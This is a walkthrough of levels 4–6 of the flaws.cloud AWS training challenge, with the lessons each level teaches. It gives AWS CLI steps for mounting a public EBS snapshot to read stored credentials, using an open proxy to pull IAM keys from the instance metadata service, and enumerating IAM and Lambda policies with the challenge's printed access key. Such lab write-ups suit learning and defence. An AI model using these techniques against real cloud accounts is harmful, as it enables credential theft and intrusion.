Flaws AWS Walkthrough Part 2

This is part 1

LEVEL 4:

• In this level you need to get access to the web page running on an EC2 at (4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud),so let's try to access the URL directly

As you can see, we should have credentials.

• We need the account ID, which we get using the AWS key from the previous level:

aws --profile key_flaws sts get-caller-identity

This command also shows you the account's name, which here is "backup"

• Now, let's run this command to take a look at or describe an EC2 snapshot

aws --profile key_flaws ec2 describe-snapshots --owner-id 975426262029

• Just to note that if you remove the --owner-id from the command when you run it, you can see all publicly readable snapshots.

as we can see we have a lot of info such as the encrypted is false, the progress is "100%" that's mean we successfully got a snapshot, we obtain a volume ID and the volume size which is "8". 

• Now, I have snapshot ID I'm just copy it and lets create a volume using the snapshot

• To do that, I should sign in to my AWS account and make an EC2 instance and I'll clarify the steps

• I gave it a name, and I chose the Ubuntu instance.

• Now, we should choose a name for the key and create it.

• Now, I select the option my IP and then launch the instance.

• Now, I go back to my terminal, select the path where the key was downloaded, and then change the mod of the file.

• Now, I am going to create a volume using a command below but first you just check the availability zone I'm in us-west-2b.

aws --profile Nawras ec2 create-volume --availability-zone us-west-2b --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

As you can see, the status is "creating", and we also have a volume ID. Let's copy it and use it then.

• Back to my AWS account and choose volume to check the volume that I have been creating and attach it to the instance

• Now, I need to grab the public IP, so I go to EC2 and select the instance that I created.

• and I copy the IP to use it then.

• Then we launch the instance and connect to it via SSH

ssh ubuntu@54.202.74.76 -i theflaws4.pem

• I just hit enter and print yes then I obtain an ssh session.

• I list the volume to see what volume available to us lsblk and then run sudo file -s /dev/xvdf1 to mount this extra volume

• the next step we mount it sudo mount /dev/xvdf1 /mnt then

• As you can see, I found the user name and password. Now I can dig around in that snapshot of EC2 that is hosting this web server.

• Now that I've finished this challenge, I've found the path to level 5.

The flaws in this level:

AWS allows you to make snapshots of EC2's and databases (RDS). The main purpose for that is to make backups, but people sometimes use snapshots to get access back to their own EC2's when they forget the passwords. This also allows attackers to get access to things. Snapshots are normally restricted to your own account, by default snapshots are private, and you can transfer them between accounts securely by specifying the account ID of the other account, but a number of people just make them public and forget about them it seems.

LEVEL 5:

• In this level We can read the description given to this; it is easy to have a simple HTTP-only proxy on EC2, and there are some examples of its usage, which means we are going to leverage the feature of proxy in AWS. You should learn that there is some thing called the Magic API (it is nothing but 169.254.169.254, and it is the metadata service), which will give you a few details about the instances or other factors. You can read the AWS specific docs on it.
• Now we can see if we can use this proxy to figure out how to list the contents of the level 6 bucket, which means we finally need to get IAM credentials with which we can list that S3 bucket. Now if we try to click on the link of level 6, we will obtain this message: Level 6 is hosted in a sub-directory, but to figure out that directory, you need to play level 5 properly.
• So what will we do? We go back and click on this link (http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/) and then we just type the magic API with the link; see the picture below.

• Now, I want to navigate to the latest

• then navigate to the meta-data

there is so many things of our interest but we need finally to get the IAM credentials, so I am locking only for IAM this time

• Now, I want to navigate to the security-credentials

• then navigate to flaws

now we got access key ID, secret access key and the token.

• We just need to capture the token to solve the problem so I'm going to set my AWS configure by using these three values.

• then I'm going to edit the aws credentials file to add access token.

• Now we can list the s3 bucket using this command

aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud --profile level5

• Now we should copy the name of the directory and add it to the URL of level 6 to access the level properly.

• I want to draw your attention to the fact that these credentials are short-lived and that they change after a while, so If you have problems refusing access, take the steps back and get new credentials.

The flaws in this level:
The IP address 169.254.169.254 is a magic IP in the cloud world. AWS and others use this to allow cloud resources to find out metadata about themselves. If you can make any sort of HTTP request from an EC2 to that IP, you'll likely get back information the owner would prefer you not see. A similar problem to getting access to the IAM profile's access keys is access to the EC2's user-data, which people sometimes use to pass secrets to the EC2 such as API keys or credentials.

Avoiding this mistake
Ensure your applications do not allow access to 169.254.169.254 or any local and private IP ranges. Additionally, ensure that IAM roles are restricted as much as possible.

LEVEL 6:

• this level is final challenge, you're getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account. Access key ID: AKIAJFQ6E7BY57Q3OBGA Secret: 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 The SecurityAudit group can get a high level overview of the resources in an AWS account, but it's also useful for looking at IAM policies.
• first I'm going to create an AWS profile "level6" with this credentials.

• Now we trying to get IAM details like what polices are attached with this user.

so, user name is level6 and the next thing is we are going to find out what all the policies we can get in this IAM. we do that by using this command:

aws --profile level6 iam list-attached-user-policies --user-name Level6

as we can see there are two attached polices this user but the "PolicyName": "list_apigateways" would be of our interest so we should try to figure out what it is

• now I just copy the ARN and use this command :

aws --profile level6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways

we got the policy details, so what is interesting things here is the policy ID and the version is "v4"

• Now we want to see what the actual policy is I am going to use this command :

aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4

that means this policy call "apigateway:GET" on "arn:aws:apigateway:us-west-2::/restapis/*" and it is used to call a lambda function
So the next step is to figure out what all the lambda functions are there and how we can leverage those details to form a URL with the lambda execution.

aws --region us-west-2 --profile level6 lambda list-functions

there is one function attached to this user, function name is level6 and there is python 2.7 that's mean lambda is written in python

• Now, let's run the securityAudit

aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6

We got the details of this policy so, with this policy we came to know that there is an action "lambda:InvokeFunction" whose resources is this one "arn:aws:lambda:us-west-2:975426262029:function:Level6\" and condition is "arn:aws:execute-api" and we need to API ID so I'm going to copy it then use with that other attached policy:

aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"

we got the stage name "Prod" which we would need to create an URL
now, we need to figure out what we execute ID API, what will be the proper URL to execute this API.
From AWS DOCS the way is :
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
then the link will be :
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

then I copy the URL in the page and then visit it

The flaws in this level:
The ability to read your own and other's IAM policies can really help an attacker figure out what exists in your environment and look for weaknesses and mistakes. It is common to give people and entities read-only permissions such as the SecurityAudit policy.
To avoiding this mistake don't hand out any permissions liberally, even permissions that only let you read meta-data or know what your permissions are.